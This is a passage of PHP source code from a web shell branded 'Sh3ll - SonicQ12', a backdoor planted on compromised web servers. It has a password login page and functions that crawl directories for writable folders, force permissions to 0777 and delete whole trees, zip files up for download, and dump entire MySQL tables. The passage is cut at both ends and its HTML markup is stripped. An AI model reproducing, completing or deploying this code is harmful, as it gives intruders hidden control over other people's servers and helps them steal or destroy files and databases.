.= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : ''); $multipage = $multipage ? '

Pages: '.$multipage.'

' : ''; } return $multipage; } function loginpage() { ?> Sh3ll - SonicQ12
[ ACCESS DENIED ]
Your IP:
Password:
Can not connect to MySQL server'); exit; } if($link && $dbname) { if (!@mysql_select_db($dbname, $link)) { p('

Database selected has error

'); exit; } } if($link && mysql_get_server_info() > '4.1') { if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) { q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link); } } return $link; } function s_array(&$array) { if (is_array($array)) { foreach ($array as $k => $v) { $array[$k] = s_array($v); } } else if (is_string($array)) { $array = stripslashes($array); } return $array; } function html_clean($content) { $content = htmlspecialchars($content); $content = str_replace("\n", "
", $content); $content = str_replace(" ", "  ", $content); $content = str_replace("\t", "    ", $content); return $content; } function getChmod($filepath){ return substr(base_convert(@fileperms($filepath),10,8),-4); } function getPerms($filepath) { $mode = @fileperms($filepath); if (($mode & 0xC000) === 0xC000) {$type = 's';} elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} elseif (($mode & 0x8000) === 0x8000) {$type = '-';} elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} else {$type = '?';} $owner['read'] = ($mode & 00400) ? 'r' : '-'; $owner['write'] = ($mode & 00200) ? 'w' : '-'; $owner['execute'] = ($mode & 00100) ? 'x' : '-'; $group['read'] = ($mode & 00040) ? 'r' : '-'; $group['write'] = ($mode & 00020) ? 'w' : '-'; $group['execute'] = ($mode & 00010) ? 'x' : '-'; $world['read'] = ($mode & 00004) ? 'r' : '-'; $world['write'] = ($mode & 00002) ? 'w' : '-'; $world['execute'] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; } function getUser($filepath) { if (function_exists('posix_getpwuid')) { $array = @posix_getpwuid(@fileowner($filepath)); if ($array && is_array($array)) { return ' / '.$array['name'].''; } } return ''; } function deltree($deldir) { $mydir=@dir($deldir); while($file=$mydir->read()) { if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { @chmod($deldir.'/'.$file,0777); deltree($deldir.'/'.$file); } if (is_file($deldir.'/'.$file)) { @chmod($deldir.'/'.$file,0777); @unlink($deldir.'/'.$file); } } $mydir->close(); @chmod($deldir,0777); return @rmdir($deldir) ? 1 : 0; } function bg() { global $bgc; return ($bgc++%2==0) ? 'alt1' : 'alt2'; } function getPath($scriptpath, $nowpath) { if ($nowpath == '.') { $nowpath = $scriptpath; } $nowpath = str_replace('\\', '/', $nowpath); $nowpath = str_replace('//', '/', $nowpath); if (substr($nowpath, -1) != '/') { $nowpath = $nowpath.'/'; } return $nowpath; } function getUpPath($nowpath) { $pathdb = explode('/', $nowpath); $num = count($pathdb); if ($num > 2) { unset($pathdb[$num-1],$pathdb[$num-2]); } $uppath = implode('/', $pathdb).'/'; $uppath = str_replace('//', '/', $uppath); return $uppath; } function getcfg($varname) { $result = get_cfg_var($varname); if ($result == 0) { return 'No'; } elseif ($result == 1) { return 'Yes'; } else { return $result; } } function getfun($funName) { return (false !== function_exists($funName)) ? 'Yes' : 'No'; } function GetList($dir){ global $dirdata,$j,$nowpath; !$j && $j=1; if ($dh = opendir($dir)) { while ($file = readdir($dh)) { $f=str_replace('//','/',$dir.'/'.$file); if($file!='.' && $file!='..' && is_dir($f)){ if (is_writable($f)) { $dirdata[$j]['filename']=str_replace($nowpath,'',$f); $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); $dirdata[$j]['dirchmod']=getChmod($f); $dirdata[$j]['dirperm']=getPerms($f); $dirdata[$j]['dirlink']=ue($dir); $dirdata[$j]['server_link']=$f; $dirdata[$j]['client_link']=ue($f); $j++; } GetList($f); } } closedir($dh); clearstatcache(); return $dirdata; } else { return array(); } } function qy($sql) { $res = $error = ''; if(!$res = @mysql_query($sql)) { return 0; } else if(is_resource($res)) { return 1; } else { return 2; } return 0; } function q($sql) { return @mysql_query($sql); } function fr($qy){ mysql_free_result($qy); } function sizecount($size) { if($size > 1073741824) { $size = round($size / 1073741824 * 100) / 100 . ' G'; } elseif($size > 1048576) { $size = round($size / 1048576 * 100) / 100 . ' M'; } elseif($size > 1024) { $size = round($size / 1024 * 100) / 100 . ' K'; } else { $size = $size . ' B'; } return $size; } class PHPZip{ var $out=''; function PHPZip($dir) { if (@function_exists('gzcompress')) { $curdir = getcwd(); if (is_array($dir)) $filelist = $dir; else{ $filelist=$this -> GetFileList($dir); foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); } if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); else chdir($curdir); if (count($filelist)>0){ foreach($filelist as $filename){ if (is_file($filename)){ $fd = fopen ($filename, 'r'); $content = @fread ($fd, filesize($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($filename); $this -> addFile($content, $filename); } } $this->out = $this -> file(); chdir($curdir); } return 1; } else return 0; } function GetFileList($dir){ static $a; if (is_dir($dir)) { if ($dh = opendir($dir)) { while ($file = readdir($dh)) { if($file!='.' && $file!='..'){ $f=$dir .'/'. $file; if(is_dir($f)) $this->GetFileList($f); $a[]=$f; } } closedir($dh); } } return $a; } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } function sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1; $fields = q("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",\n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } fr($fields); $keys = q("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" && $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } fr($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY ($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "\n);\n\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = q("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter<$numfields) { if (!$firstfield) { $tabledump.=", "; } else { $firstfield=0; } if (!isset($row[$fieldcounter])) { $tabledump .= "NULL"; } else { $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; } } $tabledump .= ");\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } } fr($rows); if ($fp) { fwrite($fp,"\n"); } else { echo "\n"; } } function ue($str){ return urlencode($str); } function p($str){ echo $str."\n"; } function tbhead() { p(''); } function tbfoot(){ p('
'); } function makehide($name,$value=''){ p(""); } function makeinput($arg = array()){ $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; $arg['extra'] = $arg['extra'] ? $arg['extra'] : ''; !$arg['type'] && $arg['type'] = 'text'; $arg['title'] = $arg['title'] ? $arg['title'].'
' : ''; $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; if ($arg['newline']) { p("

$arg[title]

"); } else { p("$arg[title]"); } } function makeselect($arg = array()){ if ($arg['onchange']) { $onchange = 'onchange="'.$arg['onchange'].'"'; } $arg['title'] = $arg['title'] ? $arg['title'] : ''; if ($arg['newline']) p('

'); p("$arg[title] "); if ($arg['newline']) p('

'); } function formhead($arg = array()) { !$arg['method'] && $arg['method'] = 'post'; !$arg['action'] && $arg['action'] = $self; $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; !$arg['name'] && $arg['name'] = 'form1'; p("
"); if ($arg['title']) { p('

'.$arg['title'].' »

'); } } function maketext($arg = array()){ !$arg['cols'] && $arg['cols'] = 100; !$arg['rows'] && $arg['rows'] = 25; $arg['title'] = $arg['title'] ? $arg['title'].'
' : ''; p("

$arg[title]

"); } function formfooter($name = ''){ !$name && $name = 'submit'; p('

'); p('
'); } function formfoot(){ p(''); } function pr($a) { echo '
';

    print_r($a);

    echo '
'; } ?>